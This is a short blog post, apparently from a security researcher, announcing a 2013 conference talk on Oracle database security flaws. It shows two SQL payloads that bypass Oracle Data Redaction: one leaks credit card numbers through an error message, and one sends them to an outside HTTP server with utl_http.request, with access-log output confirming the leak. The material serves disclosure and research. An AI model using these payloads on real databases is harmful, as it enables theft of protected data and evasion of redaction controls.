Archive for November, 2013

Best of Oracle Security 2013

Freitag, November 22nd, 2013

I just uploaded my DOAG 2013 presentation „Best of Oracle Security 2013„.

 

This presentation shows how to bypass Oracle Data Redaction, become DBA using CREATE ANY INDEX, Hide information from Oracle Auding using VPD and more…

—————————————————

SQL> select * from scott.credit_card where 1=ordsys.ord_dicom.getmappingxpath((card_id),user,user);

ERROR at line 1:

ORA-53044: invalid tag: 1234-1234-1234-1234
ORA-06512: at „ORDSYS.ORDERROR“, line 5
ORA-06512: at „ORDSYS.ORD_DICOM_ADMIN_PRV“, line 1394
ORA-06512: at „ORDSYS.ORD_DICOM_ADMIN_PRV“, line 479
ORA-06512: at „ORDSYS.ORD_DICOM_ADMIN_PRV“, line 8232
ORA-06512: at „ORDSYS.ORD_DICOM“, line 756
ORA-06512: at line 1

 

or

 

select * from credit_card where 1=length(utl_http.request(‚http://192.168.2.102:8080/’||card_id));

==> bypassing the obfuscation because the utl_http.request is located in the where clause

 

——– output from access.log ————

192.168.2.101 – – [13/Sep/2013:15:19:20 Central Europe Daylight Time] „GET /1234-1234-1234-1234 HTTP/1.1″ 404 35 – –

192.168.2.101 – – [13/Sep/2013:15:19:20 Central Europe Daylight Time] „GET /5678-5678-5678-5678 HTTP/1.1″ 404 35 – –

——– output from access.log ————

—————————————————